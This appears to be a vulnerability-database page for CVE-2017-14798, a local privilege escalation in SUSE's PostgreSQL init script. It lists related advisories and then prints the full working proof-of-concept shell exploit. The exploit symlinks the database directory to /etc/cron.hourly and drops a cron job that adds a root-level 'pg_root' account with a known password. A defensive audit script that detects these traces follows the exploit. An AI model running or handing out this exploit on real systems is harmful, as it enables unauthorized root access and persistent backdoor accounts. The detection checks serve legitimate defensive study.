| Title | Published | Views | Family |
|---|---|---|---|
| PostgreSQL 9.4-0.5.3 - Privilege Escalation Exploit | 13 Aug 2018 00:00 | – | zdt |
| CVE-2017-14798 | 13 Aug 2018 11:29 | – | circl |
| Micro Focus SUSE Linux Enterprise Server Competitive Conditions Vulnerability | 5 Mar 2018 00:00 | – | cnvd |
| CVE-2017-14798 | 1 Mar 2018 19:00 | – | cve |
| CVE-2017-14798 local privilege escalation in SUSE postgresql init script | 1 Mar 2018 19:00 | – | cvelist |
| EUVD-2017-6287 | 7 Oct 2025 00:30 | – | euvd |
| PostgreSQL 9.4-0.5.3 - Privilege Escalation | 13 Aug 2018 00:00 | – | exploitpack |
| K000148351: PostgreSQL vulnerabilities CVE-2017-15098, CVE-2017-14798, CVE-2016-7048, CVE-2016-5424, and CVE-2016-5423 | 30 Oct 2024 22:03 | – | f5 |
| CVE-2017-14798 | 1 Mar 2018 20:29 | – | nvd |
| SUSE: Security Advisory (SUSE-SU-2017:3107-1) | 9 Jun 2021 00:00 | – | openvas |

```sh
# Exploit Title: PostgreSQL 9.4-0.5.3 - Privilege Escalation
# Date: 2017-10-11
# Exploit Author: Johannes Segitz
# Vendor Homepage: https://bugzilla.suse.com/show_bug.cgi?id=1062722
# Software Link: -
# Version: Before postgresql-init-9.4-0.5.3.1
# Tested on: SUSE Linux Enterprise 11 SP4
# CVE : CVE-2017-14798
#!/bin/sh
# don't use spaces or other funny characters in here
CRON_DIR='/etc/cron.hourly'
CRON_FILE="$CRON_DIR/totally_not_a_lpe"
declare -a CLEANUP_ELEMENTS=('base' 'global' 'pg_clog' 'pg_hba.conf' 'pg_ident.conf' 'pg_multixact' 'pg_subtrans' 'pg_tblspc' 'pg_twophase' 'PG_VERSION' 'pg_xlog' 'postgresql.conf')
if [ "$(whoami)" != "postgres" ]; then
    echo "Must be run as user postgres"
    exit -1
fi
cd
echo setting up exploit
mv data data2
ln -s $CRON_DIR data
echo waiting for DB restart
while [ ! -w $CRON_DIR ]; do
    sleep 1
done
echo able to write $CRON_DIR
echo '#!/bin/sh' > $CRON_FILE
echo 'echo '"'"'pg_root:x:0:0:,,,:/home/pg_root:/bin/bash'"'"' >> /etc/passwd' >> $CRON_FILE
echo 'echo '"'"'pg_root:$2y$05$6F6hHGfvZ42Mq1EF8V.e8uguGumaZsZ4P9qfjiuHFT/k8B2CZrJaO:16339:0:99999:7:::'"'"' >> /etc/shadow' >> $CRON_FILE
echo "rm $CRON_FILE" >> $CRON_FILE
echo "chown root.root ${CRON_DIR}" >> $CRON_FILE
chmod +x $CRON_FILE
if [ -e $CRON_FILE ]; then
    echo wrote $CRON_FILE
else
    echo failed to write $CRON_FILE, exiting
    exit 1
fi
echo cleaning up
for i in "${CLEANUP_ELEMENTS[@]}"; do
    rm -rf "$CRON_DIR/$i"
done
rm data
mv data2 data
echo now wait, depending on CRON_DIR setting you should be able to log into this system with pg_root:foobar soonish. Enjoy!
```
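
The PoC above leaves three things a defender can look for: a data directory that is a symlink, a cron directory that is no longer root-owned or that holds PostgreSQL cluster files, and a second uid-0 account. The audit functions below are an added example, not part of the original PoC or the SUSE advisory; the function names and the default paths in `audit` (a SLES 11 style layout) are assumptions.

```shell
#!/bin/sh
# Added defensive example, not part of the original PoC. Paths are passed in
# so the checks can run against a constructed tree as well as a live host.

# 1. The PoC swaps the postgres data directory for a symlink.
check_datadir() {  # $1 = data directory path
    if [ -L "$1" ]; then
        echo "FINDING: $1 is a symlink -> $(readlink "$1")"
        return 1
    fi
    return 0
}

# 2. After a restart the symlink target becomes writable by postgres and
#    may hold leftover cluster files if the PoC's cleanup did not finish.
check_dir() {  # $1 = directory, $2 = expected owner uid (0 on a live host)
    dir_rc=0
    owner=$(ls -ldn "$1" | awk '{print $3}')
    if [ "$owner" != "$2" ]; then
        echo "FINDING: $1 owned by uid $owner, expected $2"
        dir_rc=1
    fi
    for f in PG_VERSION pg_hba.conf postgresql.conf base global pg_xlog; do
        if [ -e "$1/$f" ]; then
            echo "FINDING: PostgreSQL cluster file $1/$f"
            dir_rc=1
        fi
    done
    return $dir_rc
}

# 3. The dropped cron job appends a second uid-0 account to the passwd file.
check_uid0() {  # $1 = passwd-format file
    extra=$(awk -F: '$3 == 0 && $1 != "root" {print $1}' "$1")
    if [ -n "$extra" ]; then
        echo "FINDING: extra uid-0 account(s) in $1:" $extra
        return 1
    fi
    return 0
}

# Run all three; the default paths are assumptions for a SLES 11 host.
audit() {  # $1 = datadir, $2 = cron dir, $3 = passwd file, $4 = owner uid
    audit_rc=0
    check_datadir "${1:-/var/lib/pgsql/data}" || audit_rc=1
    check_dir "${2:-/etc/cron.hourly}" "${4:-0}" || audit_rc=1
    check_uid0 "${3:-/etc/passwd}" || audit_rc=1
    return $audit_rc
}
```

Because the PoC restores ownership and removes its cron file after it runs, checks 1 and 2 are most useful run periodically or before a database restart; check 3 catches the persistent result.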